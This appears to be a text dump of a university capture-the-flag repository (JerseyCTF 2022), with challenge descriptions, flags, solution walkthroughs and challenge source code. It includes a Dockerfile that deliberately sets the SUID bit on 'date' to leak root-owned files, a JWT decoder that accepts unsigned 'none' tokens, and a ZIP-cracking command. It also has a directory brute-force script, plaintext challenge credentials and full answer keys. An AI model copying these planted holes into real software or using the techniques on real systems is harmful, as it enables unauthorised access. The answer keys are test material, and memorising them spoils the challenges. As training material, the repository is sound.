IPs in 10.0.0.0/8 range...") 18 | priv_addresses = [str(ip) for ip in ipaddress.IPv4Network('10.0.0.0/8').hosts()] 19 | 20 | #Generate a random list of IP addresses in the private range. 21 | print(f"Getting {num_answers} random IPs...") 22 | random_ips = (random.sample(priv_addresses, num_answers)) 23 | 24 | #Internal string containing answer list, used to calculate hash later. 25 | answer_list_internal = "" 26 | 27 | #Generate answer list. Gets each random IP (in order), hashes the string and 28 | #outputs a line containing each IP and hash, separated by a space. 29 | print("Generating answer list...") 30 | for ip in random_ips: 31 | ip_hash = (hashlib.sha256(ip.encode())).hexdigest() 32 | answer_list.write(f"{ip} {ip_hash}\n") 33 | answer_list_internal += (f"{ip} {ip_hash}\n") 34 | 35 | #Set random start time for challenge logs. 36 | seed_time = (dt.now() - timedelta(days=5)) 37 | 38 | #Strings to generate fake dnsmasq logs. 39 | dnsmasq_string = "dnsmasq[28478]:" 40 | query_string = "query[A] dns.google.com from" 41 | forward_string = "forwarded dns.google.com to" 42 | cached_string = "cached dns.google.com is" 43 | reply_string = "reply dns.google.com is" 44 | 45 | #Generate dnsmasq logs using randomly selected IPs above. 46 | for i in range(len(random_ips)): 47 | ip = random_ips[i] 48 | log_type = random.randint(0,1) 49 | step_time = random.uniform(3, 16) 50 | seed_time = seed_time + timedelta(seconds=step_time) 51 | log_time = (seed_time.strftime("%b %d %H:%M:%S")) 52 | 53 | #Log entries for cached DNS records. 54 | if log_type == 0: 55 | question_file.write(f"{log_time} {dnsmasq_string} {query_string} {ip}\n") 56 | question_file.write(f"{log_time} {dnsmasq_string} {forward_string} {ip}\n") 57 | question_file.write(f"{log_time} {dnsmasq_string} {reply_string} {ip}\n") 58 | 59 | #Log entries for forwarded DNS requests. 60 | else: 61 | question_file.write(f"{log_time} {dnsmasq_string} {query_string} {ip}\n") 62 | question_file.write(f"{log_time} {dnsmasq_string} {cached_string} {ip}\n") 63 | question_file.write(f"{log_time} {dnsmasq_string} {reply_string} {ip}\n") 64 | 65 | #Write flag to file. 66 | flag_hash = (hashlib.sha256(answer_list_internal.encode())).hexdigest() 67 | flag_out.write(f"jctf{{{flag_hash}}}") 68 | -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/dnsmasq-ip-extract-flag.txt: -------------------------------------------------------------------------------- 1 | jctf{90dc97926e09a45aa02ca3a95db387bb00ff83ccff18f4d18a3eb96b4893e8bb} -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.ps1: -------------------------------------------------------------------------------- 1 | #Open file for processing. 2 | $file_in = Get-Content -Path ".\dnsmasq-ip-extract-dnsmasq.log" 3 | 4 | #Output file for answer (will be hashed later for the flag). 5 | $file_out = ".\powershell_answer.txt" 6 | 7 | #Clear contents of output file if it exists. 8 | if (Test-Path $file_out) 9 | { 10 | Clear-Content($file_out) 11 | } 12 | 13 | #List to store discovered IP addresses. 14 | $ip_list = @() 15 | 16 | #Populate IP list, this will deduplicate addresses and maintain the 17 | #order presented in the logs (important for correct hash generation). 18 | foreach ($line in $file_in) 19 | { 20 | $ip = $line.split(" ")[-1] -replace "`n","" 21 | if ($ip_list -notcontains $ip) 22 | { 23 | $ip_list += $ip 24 | } 25 | } 26 | 27 | #Calculate hash for each IP and write to file. 28 | foreach($ip in $ip_list) 29 | { 30 | $ip_hash = Get-FileHash -InputStream ([System.IO.MemoryStream]::New([System.Text.Encoding]::ASCII.GetBytes($ip))) 31 | "$($ip) $($ip_hash.Hash.toLower())" | Out-File -Append -FilePath "powershell_answer.txt" 32 | } 33 | 34 | #Get hash of output file and create flag. 35 | #Participants can generate hash in a terminal or other program. 36 | $output_hash = (Get-FileHash $file_out).Hash.toLower() 37 | Write-Output("jctf{$output_hash}") -------------------------------------------------------------------------------- /misc/dnsmasq-ip-extract/sol/solution_scripts/dnsmasq-ip-extract-solution.py: -------------------------------------------------------------------------------- 1 | #Library for calculating hashes in Python. 2 | #Participants could also import os and use their OS' native commands. 3 | import hashlib 4 | 5 | #Open log file for processing. 6 | file_in = open("dnsmasq-ip-extract-dnsmasq.log", "r") 7 | 8 | #List to store discovered IP addresses. 9 | ip_list = [] 10 | 11 | #String containing the answer output. 12 | answer = "" 13 | 14 | #Populate IP list, this will deduplicate addresses and maintain the 15 | #order presented in the logs (important for correct hash generation). 16 | for line in file_in: 17 | ip = ((line.split(" "))[-1]).strip("\n") 18 | if ip not in ip_list: 19 | ip_list.append(ip) 20 | 21 | for ip in ip_list: 22 | ip_hash = (hashlib.sha256(ip.encode())).hexdigest() 23 | answer += (f"{ip} {ip_hash}\n") 24 | 25 | #Get hash of answer from above and generate hash. 26 | #Participant are instructed to output the answer to a file for hashing. 27 | answer_hash = (hashlib.sha256(answer.encode())).hexdigest() 28 | print(f"jctf{{{answer_hash}}}") -------------------------------------------------------------------------------- /misc/filtered-feeders/README.md: -------------------------------------------------------------------------------- 1 | # filtered-feeders 2 | 3 | ## Challenge Text 4 | * The fishing net caught plenty of herrings, but the flag is nowhere to be found! Try to find the flag within the pile of fish. 5 | 6 | ## Hint 7 | * How do you hide an image within an image? 8 | 9 | ## Solution 10 | * Use an image steganography decoder like this - https://incoherency.co.uk/image-steganography/ 11 | * Select **Unhide image**, upload the image, and use the slider to extract the lowest 2 bits for the hidden image. 12 | * Flag: `jctf{1_l0v3_h3rr1n65}` 13 | 14 | ## Credit 15 | * Developed by [Tensei](https://github.com/SemiCicada) 16 | -------------------------------------------------------------------------------- /misc/filtered-feeders/challenge/herrings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/filtered-feeders/challenge/herrings.png -------------------------------------------------------------------------------- /misc/firewall-rules/README.md: -------------------------------------------------------------------------------- 1 | # firewall-rules 2 | 3 | ## Challenge Text 4 | * Liar, Liar, Rules on Fire! A network administrator configured a device's firewall, but made a few errors along the way. Some of your favorite applications may have been denied... We can't worry about that yet, first step is to make sure external hosts aren't able to exploit vulnerable firewall rules. 5 | * Sum the vunerable ports and put the answer in the flag format: jctf{INSERT NUMBER} 6 | 7 | ## Hint 8 | * Sometimes Google searches lead to numbers! 9 | * Focus on remote access. 10 | 11 | ## Solution 12 | * Pull up list of TCP and UDP port numbers: https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers 13 | * Query through each firewall rule and note that the allowed insecure ports that provide remote access or unencrypted connection are: 513 (rlogin), 23 (telnet), 3389 (RDP) 14 | * 513 + 23 + 3389 = jctf{3925} 15 | 16 | ## Credit 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /misc/firewall-rules/challenge/firewall rules.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/firewall-rules/challenge/firewall rules.xlsx -------------------------------------------------------------------------------- /misc/root-me/README.md: -------------------------------------------------------------------------------- 1 | # root-me 2 | 3 | ## Challenge Text 4 | * SSH into the challenge host, 0.cloud.chals.io on port 19777 5 | * Username: ubuntu Password: jctf2022! 6 | * Find the flag 7 | 8 | ## Solution 9 | * Use the find command to find any files owned by root with the SUID bit set 10 | ``` 11 | find / -perm -4000 12 | ``` 13 | 14 | * Use the date command to leak the flag 15 | ``` 16 | date -f /root/flag.txt 17 | ``` 18 | * Flag: `jctf{4cc355_6r4n73d}` 19 | 20 | ## Credit 21 | * Developed by [Rob](https://github.com/njccicrob) 22 | -------------------------------------------------------------------------------- /misc/root-me/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && apt install openssh-server sudo -y 4 | 5 | RUN apt install net-tools sudo -y 6 | 7 | RUN groupadd --gid 1000 ubuntu 8 | 9 | RUN useradd -rm -d /home/ubuntu -s /bin/bash -g ubuntu -u 1000 ubuntu 10 | 11 | RUN echo 'ubuntu:jctf2022!' |chpasswd 12 | 13 | RUN sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config 14 | 15 | RUN service ssh start 16 | 17 | EXPOSE 2222 18 | 19 | CMD ["/usr/sbin/sshd","-D"] 20 | 21 | COPY flag.txt /root 22 | 23 | RUN chmod 4755 /usr/bin/date 24 | 25 | RUN chmod a-w /tmp 26 | 27 | RUN chmod a-w /home/ubuntu 28 | 29 | RUN chown -R root:root /home/ubuntu 30 | -------------------------------------------------------------------------------- /misc/root-me/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{4cc355_6r4n73d} 2 | -------------------------------------------------------------------------------- /misc/snort-log/README.md: -------------------------------------------------------------------------------- 1 | # snort-log 2 | 3 | ## Challenge Text 4 | * Let's just say: we are absolutely screwed. The company network administrator recently deployed Snort on our network and immediately received 575 alerts in the log file. To put it lightly, every attack out there is infecting the network. Did you take the required Information Security training? Anyways, the company is going to file for bankruptcy because of this :(. We might as well do SOMETHING so that we can get hired elsewhere. The network administrator mentions to you that after finishing reviewing the log file, she also noticed the web server CPU load and memory usage were abnormally high. Also, what's up with all of this network traffic? Manual analysis stinks, but let's find out what this attack is and take action... 5 | * Put your answer in the flag format: jctf{INSERT STRING} 6 | 7 | ## Hint 8 | * Seems like the extra network traffic is primarily inbound, not outbound. 9 | 10 | ## Solution 11 | * Note the attack symptoms and determine it is a DDoS botnet being alerted in Snort. (Botnet indicators - https://www.altexsoft.com/blog/botnet-detection/) 12 | * Search through the alerts for the keyword DDoS - "ET TROJAN Drive DDoS Tool byte command received key=aut0m@t1on1sb3tt3r" 13 | * Flag: `jctf{aut0m@t1on1sb3tt3r}` 14 | 15 | ## Credit 16 | * Log file was generated by https://github.com/SubtleScope/logfile-generators 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /misc/we-will/README.md: -------------------------------------------------------------------------------- 1 | # we-will 2 | 3 | ## Challenge Text 4 | * A flag was left behind but it seems to be protected. 5 | 6 | ## Hint 7 | * The challenge name should help you figure out how to open it. 8 | 9 | ## Solution 10 | * Brute force the password protected ZIP file 11 | * The password is: *@@!^^$25Jjersey 12 | 13 | ``` 14 | fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip 15 | ``` 16 | 17 | ## Credit 18 | * Developed by [Rob](https://github.com/njccicrob) 19 | -------------------------------------------------------------------------------- /misc/we-will/challenge/flag.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/misc/we-will/challenge/flag.zip -------------------------------------------------------------------------------- /osint/README.md: -------------------------------------------------------------------------------- 1 | # OSINT 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [dns-joke](dns-joke) | There is a DNS joke hidden somewhere in www.jerseyctf.com. | How are IP addresses pointed towards domain names? 7 | | [photo-op-spot](photo-op-spot) |In three words tell me where I stood when I grabbed this picture. |GPS coordinates aren't the only method of specifying a location. Format for solution: jctf{yourthreewords} - no special characters. 8 | | [rarity](rarity) | With three belonging to a respective company, there are only a two-digit number amount of this entity left in the world. | Aren't sub sandwiches great? 9 | 10 | ## Medium Challenges 11 | | Challenge Name | Description | Hint 12 | |:-- | :-- | :--- 13 | | [sho-me-whats-wrong](sho-me-whats-wrong) | A company that provides affordable satellite communication services appears to have devices scattered across the Internet with a known vulnerability. | How do you filter through an Excel spreadsheet for the information you want? 14 | | [mystery](mystery) | Someone thought it would be fun to leave this mysterious clue. How do these two items lead to the flag? | This detective has innovative search tool. 15 | | [contributor](contributor) | One of the speakers actually helped us develop https://www.jerseyctf.com/ and http://www.jerseyctf.online/. | 1.0 × 10^100 16 | -------------------------------------------------------------------------------- /osint/contributor/README.md: -------------------------------------------------------------------------------- 1 | # contributor 2 | 3 | ## Challenge Text 4 | * Aren’t tech talks great? The JerseyCTF organizing staff is so grateful that our speakers can share their wonderful experiences with our participants. In fact, one of the speakers actually helped us develop https://www.jerseyctf.com/ and http://www.jerseyctf.online/. How cool is that! 5 | 6 | ## Hint 7 | * 1.0 × 10^100 8 | 9 | ## Solution 10 | * In the https://www.jerseyctf.com/ source code, find the **DRodgers** comment matches with the speaker Donnie Rodgers. 11 | * Using the **Forgot Password?** feature on http://www.jerseyctf.online, enter **DRodgers** for 3 security questions. 12 | * Using Google, locate Donnie Rodgers' [LinkedIn](https://www.linkedin.com/in/donnie-rodgers) by searching `Donnie Rodgers PlainDilemma` with the 3 answers being **Bank Heist Security 101**, **Rahway**, and **Arm wrestling**. 13 | * Flag: `jctf{b3_CAR3fu1_wh@t_yOU_put_on_the_WEB}` 14 | * Shares website with web/heres-my-password challenge. 15 | 16 | * **Important:** Donnie Rodgers is a fictional person. His name and connections to academic institutions and companies are all made up. His face is AI generated and is not a real person. 17 | 18 | ## Credit 19 | * Developed by [Andrew](https://github.com/peppermintpatty5) and [Logan](https://github.com/Git-Logan) 20 | * AI generated face made by https://generated.photos/face-generator/new 21 | -------------------------------------------------------------------------------- /osint/contributor/other/forgot_password.php: -------------------------------------------------------------------------------- 1 | [ 6 | "q" => "What was your first job's company name?", 7 | "a" => "Bank Heist Security 101" 8 | ], 9 | "q2" => [ 10 | "q" => "What city was your high school located in?", 11 | "a" => "Rahway", 12 | ], 13 | "q3" => [ 14 | "q" => "What is your favorite sport?", 15 | "a" => "Arm wrestling" 16 | ] 17 | ]; 18 | 19 | function showFirstForm() 20 | { 21 | ?> 22 |
23 | 26 | 27 |
28 | 35 |

Security Questions

36 |
37 | $question) { ?> 39 | 42 |
43 | 44 | 45 |
46 | 52 | 55 | 60 | 63 | 64 | 65 | 66 | 67 | 68 | Forgot Password 69 | 70 | 71 | 72 |

Forgot Password

73 | 74 | $question) { 91 | if ($_POST[$question_id] !== $question["a"]) { 92 | $missed_question = $question; 93 | break; 94 | } 95 | } 96 | if ($missed_question === null) { 97 | showFirstForm(); 98 | scriptAlert(FLAG); 99 | } else { 100 | showSecondForm(); 101 | scriptAlert("Incorrect Answer(s)"); 102 | } 103 | } 104 | } else { 105 | showFirstForm(); 106 | } ?> 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /osint/contributor/other/headshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/contributor/other/headshot.png -------------------------------------------------------------------------------- /osint/contributor/other/index.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | 11 | Login 12 | 13 | 14 | 15 |

Login

16 |
17 | 20 |
21 | 24 |
25 | 26 |
27 | Forgot Password? 28 | 31 | 34 | 35 | 38 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /osint/dns-joke/README.md: -------------------------------------------------------------------------------- 1 | # dns-joke 2 | 3 | ## Challenge Text 4 | * A system administrator hasn't smiled in days. Legend has it, there is a DNS joke hidden somewhere in www.jerseyctf.com. Can you help us find it to make our system administrator laugh? 5 | 6 | ## Hint 7 | * How are IP addresses pointed towards domain names? 8 | 9 | ## Solution 10 | * Use any of the following dig, nslookup, or host commands to search the DNS records of www.jerseyctf.com: 11 | * dig www.jerseyctf.com txt 12 | * dig -t txt www.jerseyctf.com +short 13 | * host -t txt www.jerseyctf.com 14 | * nslookup -type=txt www.jerseyctf.com 15 | * The flag will be in a string: `jctf{DNS_J0k3s_t@k3_24_hrs}` 16 | 17 | ## Credit 18 | * Developed by [Logan](https://github.com/Git-Logan) 19 | -------------------------------------------------------------------------------- /osint/mystery/README.md: -------------------------------------------------------------------------------- 1 | # mystery 2 | 3 | ## Challenge Text 4 | * Someone thought it would be fun to leave this mysterious clue. How do these two items lead to the flag? 5 | 6 | ## Hint 7 | * This detective has an innovative search tool. 8 | 9 | ## Solution 10 | * Realize that the image of Benedict Cumberbatch is pointing towards Sherlock. The Sherlock tool can be used with a username to identify their online and social media accounts. By running it, identify several social media accounts including Twitter. Search of recent njcybersecurity Tweets shows a comment on March 2nd with the flag. 11 | * Flag: `jctf{Myst3ry-S0lv3d!}` 12 | 13 | ## Credit 14 | * Developed by [Mandy](https://github.com/mrsgcyber) 15 | -------------------------------------------------------------------------------- /osint/mystery/challenge/mystery.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/mystery/challenge/mystery.JPG -------------------------------------------------------------------------------- /osint/photo-op-spot/README.md: -------------------------------------------------------------------------------- 1 | # photo-op-spot 2 | 3 | ## Challenge Text 4 | * In three words tell me where I stood when I grabbed this picture. 5 | 6 | ## Hint 7 | * GPS coordinates aren't the only method of specifying a location. 8 | * Solution format: jctf{yourthreewords} - no special characters 9 | 10 | ## Solution 11 | * Google Reverse image search to find the Transforest statue in Seattle. 12 | * Use Google Maps Street View to find the same view of the statue. Identify the Latitude and Longitude of that location= 47.618915234129, -122.33298024678056 13 | * Use that GPS data at https://what3words.com 14 | * Flag: `jctf{unionslakespine}` 15 | 16 | ## Credit 17 | * Developed by [Mandy](https://github.com/mrsgcyber) -------------------------------------------------------------------------------- /osint/photo-op-spot/challenge/photo-op-spot.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/photo-op-spot/challenge/photo-op-spot.JPG -------------------------------------------------------------------------------- /osint/rarity/README.md: -------------------------------------------------------------------------------- 1 | # rarity 2 | 3 | ## Challenge Text 4 | * With three belonging to a respective company, there is only a two-digit number amount of this entity left in the world. There is one near this picture... how close can you get to it? 5 | * The flag format is the coordinates in decimal degrees notation, for example: `jctf{-65.91374,-10.81140}` 6 | * Get the coordinates **at the gate** 7 | 8 | ## Hint 9 | * Aren't sub sandwiches great? 10 | * https://en.wikipedia.org/wiki/Hindenburg_disaster 11 | 12 | ## Solution 13 | * Note the **330** area code in the bottom right corner of the picture which is in the Akron, Ohio area. 14 | * Based on the hint of sub sandwiches, this could point towards Blimpie Sub Sandwiches, and Blimp can be taken from this which is the entity being discussed. Alternatively, research on the provided rarity numbers + Akron can lead to this conclusion as well. 15 | * Goodyear Tires owns 3 blimps in the United States, and the 1 in Ohio is located by Wingfoot Lake. Open Google Maps and drag/drop Pegman (the person icon) to the spot closest to The Hangar. 16 | * Click to go up to the gates and note the coordinates in the URL. 17 | * Flag: `jctf{41.019753,-81.3621151}` 18 | 19 | ## Credit 20 | * Developed by [Logan](https://github.com/Git-Logan) 21 | -------------------------------------------------------------------------------- /osint/rarity/challenge/picture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/osint/rarity/challenge/picture.png -------------------------------------------------------------------------------- /osint/sho-me-whats-wrong/README.md: -------------------------------------------------------------------------------- 1 | # sho-me-whats-wrong 2 | 3 | ## Challenge Text 4 | * A company that provides affordable satellite communication services appears to have devices scattered across the Internet with a known vulnerability. SNMP seems to be in-use with these devices, although the vulnerability is with another service. [Shodan](https://shodan.io) is a search engine that allows users to passively search for devices connected to the Internet worldwide. Find the vulnerability and use the flag format jctf{ENTER CVE HERE}. 5 | 6 | * IMPORTANT: Shodan’s search results are real-life hosts. This flag needs to be found using completely legal, passive reconnaissance methods to gather OSINT on Shodan. Do not use any illegal or active reconnaissance methods for this challenge. 7 | There are a limited number of searches whether you have an account or not, so make each one count! Signing up for a free account or with a .edu email provides you additional searches. 8 | 9 | ## Hint 10 | * How do you filter through an Excel spreadsheet for the information you want? 11 | * Very-small-aperture terminal 12 | 13 | ## Solution 14 | * Pick key words from the challenge text to filter, specifically `satellite` and `SNMP` 15 | * Research [Shodan search filters](https://www.shodan.io/search/filters), different Shodan key words for a satellite: `vsat`, and the SNMP UDP port: `161` 16 | * In Shodan, search `"vsat" port:161` 17 | * Click one of the returned hosts, and note the vulnerability CVE for the flag. 18 | * Flag: `jctf{CVE-2018-19052}` 19 | 20 | ## Credit 21 | * Developed by [Logan](https://github.com/Git-Logan) 22 | -------------------------------------------------------------------------------- /sponker/README.md: -------------------------------------------------------------------------------- 1 | # speakers + sponsors 2 | 3 | ## Speaker Challenges 4 | | Speaker Name | Description | Flag 5 | |:-- | :-- | :--- 6 | | brian | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{0fJlvhqcXy} 7 | | jon | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{couch_light_pencil} 8 | | kevin | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{icCDdOlDW0} 9 | | max | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{idea_television_sleep} 10 | | debbi | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{word_testing_shirt} 11 | | pinky/eric | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{plane_bowl_mouse} 12 | | pat/jermaine/joe | Heisters can attend tech talks to refine their bank (cyber)security skills. | jctf{78POYdCGzf} 13 | 14 | ## Sponsor Challenges 15 | | Sponsor Name | Description | Flag 16 | |:-- | :-- | :--- 17 | | njccic | **Connect with NJCCIC:** *Website*: https://cyber.nj.gov | jctf{pr0t3ct_NJ_cyb3r_sp@C3} 18 | | frsecure | **Connect with FRSecure:** *Website*: https://frsecure.com/ | jctf{inf0rmation_SECURITY_#1} 19 | | google | **Connect with Google:** *Website:* https://cloud.google.com/ | jctf{z3r0_trust_infr@structure} 20 | | palo alto networks | **Connect with Palo Alto Networks:** *Website:* https://www.paloaltonetworks.com/ | jctf{gl0b@l_cyb3rSECurity_l3@der} 21 | | crowdstrike | **Connect with CrowdStrike:** *Website:* https://www.crowdstrike.com/ | jctf{br3aches_stop_HERE!} 22 | 23 | ## Feedback Challenge 24 | | Description | Flag 25 | |:-- | :-- 26 | | On Sunday, the JerseyCTF Feedback Google Form will be released on the Discord #announcements text channel. Fill out this feedback form for a flag in the confirmation message! | jctf{tH@nks_for_aTTending_PART2!} 27 | 28 | 29 | -------------------------------------------------------------------------------- /web/README.md: -------------------------------------------------------------------------------- 1 | # Web 2 | 3 | ## Easy Challenges 4 | | Challenge Name | Description | Hint 5 | |:-- | :-- | :--- 6 | | [apache-logs](apache-logs) | There is suspicion that an external host was able to access a sensitive file accidentally placed in one of the company website's directories. | Which directory types should sensitive files not be placed in? 7 | | [seigwards-secrets](seigwards-secrets) | Seigward has been storing his secrets on his website for decades. Hasn't failed him yet. | Where can you find a website's code? 8 | 9 | ## Medium Challenges 10 | | Challenge Name | Description | Hint 11 | |:-- | :-- | :--- 12 | | [buster](buster) | Check out my new site, it has lots of cool pages! | What do HTTP response codes actually mean? 13 | | [heres-my-password](heres-my-password) | We have a list of 500 users (males, females, and pets) and one password. Log-in with the proper credentials for the flag. | This is not intended to require manual brute force. What are some other types of brute force methods? 14 | | [road-not-taken](road-not-taken) | You've reached a fork in the road! Choose the right path to find your way to the flag. Start here: https://jerseyctf-road-not-taken.chals.io/ | Recent CVEs may help you find your way. 15 | |[flag-vault](flag-vault)|I'm very organized. I even keep all of my flags neatly organized in a database! But, these are my flags! You don't have access to them... or do you? Start here: jerseyctf-flag-vault.chals.io | What is the most common type of database? 16 | 17 | 18 | ## Hard Challenges 19 | | Challenge Name | Description | Hint 20 | |:-- | :-- | :--- 21 | | [cookie-factory](cookie-factory) | Here at Granny's Old-Fashioned Home-Baked Cookie Factory, we pride ourselves on our cookies AND security being the best in the business. Start here: https://jerseyctf-cookie-factory.chals.io/ | No hints. 22 | -------------------------------------------------------------------------------- /web/apache-logs/README.md: -------------------------------------------------------------------------------- 1 | # apache-logs 2 | 3 | ## Challenge Text 4 | * An apache log file that contains recent traffic was pulled from a web server. There is suspicion that an external host was able to access a sensitive file accidentally placed in one of the company website's directories. Someone's getting fired... 5 | * Identify the source IP address that was able to access the file by using the flag format: jctf{IP address} 6 | 7 | ## Hint 8 | * Which directory types should sensitive files not be placed in? 9 | 10 | ## Solution 11 | * Query through the web traffic for a connection by searching for a HTTP 200 OK success status response code. All 404's can be ignored. 12 | * Identify the accessed sensitive file that was accidentally placed in the website's temporary (tmp) folder - "https://www.davisbank.com/tmp/bankrecords.pdf" 13 | * Identify the source IP address of the connection - jctf{76.190.52.148} 14 | 15 | ## Credit 16 | * Log file was generated by https://github.com/kiritbasu/Fake-Apache-Log-Generator 17 | * Developed by [Logan](https://github.com/Git-Logan) 18 | -------------------------------------------------------------------------------- /web/buster/README.md: -------------------------------------------------------------------------------- 1 | # buster 2 | 3 | NOTE: The provided Python file, `buster.py`, should be run on a server and not be given as part of the challenge; just the URL of the server should be given. 4 | 5 | ## Challenge Text 6 | * Check out my new site, it has lots of cool pages! https://jerseyctf.xyz 7 | 8 | ## Hint 9 | * What do HTTP response codes actually mean? 10 | * The intended solution is a directory brute force. 11 | 12 | ## Solution 13 | 14 | Directory enumeration challenge where every request returns a random HTTP status 15 | 16 | The root webpage has a comment suggesting that this is probably an enumeration challenge; 17 | i.e., we want to find all of the subpages under this page. 18 | If we try an application normally used for this purpose, like DirBuster, we run into an issue. 19 | All of the pages return a randomized HTTP status, which means that these programs can't automatically figure out what is and isn't a valid page. 20 | 21 | The solution is to write our own script to search for the right page. 22 | We'll simply send requests to all of the pages in a wordlist, and see if any of them respond with something that might be the flag. 23 | Here's what that looks like in Python: 24 | 25 | ```py 26 | from multiprocessing.pool import Pool 27 | from sys import argv 28 | import requests 29 | 30 | # I used /opt/dirbuster/directory-list-2.3-small.txt for the file, 31 | # other parameters are self-explanatory 32 | if len(argv) != 4: 33 | print(f'Usage: {argv[0]} ') 34 | exit(1) 35 | 36 | url = argv[1] 37 | fname = argv[2] 38 | numthreads = int(argv[3]) 39 | 40 | # Prints out the flag if it's in the content of this page 41 | def check_page(name): 42 | name = name.strip() 43 | r = requests.get(f'{url}/{name}') 44 | if 'jctf' in r.text: 45 | print(r.text) 46 | 47 | # Uses a process pool to check all of the pages with names from the file 48 | with open(fname, 'r') as f: 49 | with Pool(processes=numthreads) as pool: 50 | pool.map(check_page, f, 256) 51 | ``` 52 | 53 | This uses multithreading to speed things up. 54 | This also means it doesn't actually stop after it prints the flag until it goes through the entire wordlist, so you have to Ctrl-C it manually. 55 | 56 | Flag: `jctf{1t5_jUst_4_nUmb3r_ag8h7z8021}` 57 | 58 | ## Credit 59 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 60 | -------------------------------------------------------------------------------- /web/buster/challenge/buster.py: -------------------------------------------------------------------------------- 1 | from flask import Flask 2 | import random 3 | 4 | app = Flask(__name__) 5 | 6 | @app.route('/') 7 | def root_page(): 8 | return 'My website has lots of subpages, see if you can find them all!\n' 9 | 10 | @app.route('/') 11 | def subpage(path): 12 | if path == 'kbgraphics': 13 | return 'jctf{1t5_jUst_4_nUmb3r_ag8h7z8021}\n', 404 14 | return f'Welcome to {path}!\n', random.choice([200, 400, 401, 402, 403, 404, 500]) 15 | -------------------------------------------------------------------------------- /web/cookie-factory/README.md: -------------------------------------------------------------------------------- 1 | # Granny's Cookie Factory 2 | 3 | ## Challenge Text 4 | * Here at Granny's Old-Fashioned Home-Baked Cookie Factory, we pride ourselves on our cookies AND security being the best in the business. Start here: https://jerseyctf-cookie-factory.chals.io/ 5 | 6 | ## Hint 7 | * None, this is a hard challenge 8 | 9 | ## Solution 10 | * Recognize that the `user` cookie is a JWT 11 | * Decode it to see that the data has the structure `{"username": ...}` 12 | * On the dashboard page, read the attached CVE to learn the the vulnerability is a user-controlled `alg` parameter 13 | * Realize that the header and data are Base64 encoded 14 | * Set the algorithm to `"none"` and Base64-encode the header section 15 | * Set the username to `"admin"` and Base64-encode the data section 16 | * Leave the signature section blank 17 | * Flag: `jctf{GEEZ_WHAT_A_TOUGH_COOKIE}` 18 | 19 | ## Credit 20 | * Developed by Edward 21 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/.dockerignore: -------------------------------------------------------------------------------- 1 | .git 2 | .gitignore 3 | 4 | Dockerfile 5 | .dockerignore 6 | 7 | env 8 | .env 9 | 10 | **/__pycache__ 11 | **/*.py[cdo] 12 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.2-slim 2 | 3 | WORKDIR /app 4 | 5 | RUN pip install --no-cache-dir gunicorn 6 | 7 | COPY requirements.txt . 8 | RUN pip install --no-cache-dir -r requirements.txt 9 | 10 | COPY app.py . 11 | COPY static static 12 | COPY templates templates 13 | 14 | EXPOSE 80 15 | 16 | CMD ["gunicorn", "app:app", "-b", "0.0.0.0:80"] 17 | -------------------------------------------------------------------------------- /web/cookie-factory/challenge/app.py: -------------------------------------------------------------------------------- 1 | from dotenv import load_dotenv 2 | from flask import Flask, abort, flash, g, make_response, redirect, render_template, request, session, url_for 3 | import jwt 4 | import os 5 | import random 6 | import string 7 | 8 | app = Flask(__name__) 9 | 10 | 11 | # Load secret environment variables 12 | load_dotenv() 13 | 14 | flag = os.getenv("FLAG", "jctf{GEEZ_WHAT_A_TOUGH_COOKIE}") 15 | 16 | app.secret_key = os.getenv("FLASK_SECRET_KEY", "".join(random.choice(string.ascii_letters) for _ in range(32))) 17 | secret = os.getenv("SECRET", "".join(random.choice(string.ascii_letters) for _ in range(32))) 18 | 19 | 20 | # JWT helper functions 21 | def encode_user(username): 22 | return jwt.encode({"username": username}, secret, algorithm="HS256") 23 | 24 | 25 | def decode_user(token): 26 | if token is None: 27 | return None 28 | 29 | try: 30 | alg = jwt.get_unverified_header(token)["alg"] 31 | 32 | if alg == "HS256": 33 | decoded = jwt.decode(token, secret, algorithms=["HS256"]) 34 | elif alg == "none": 35 | decoded 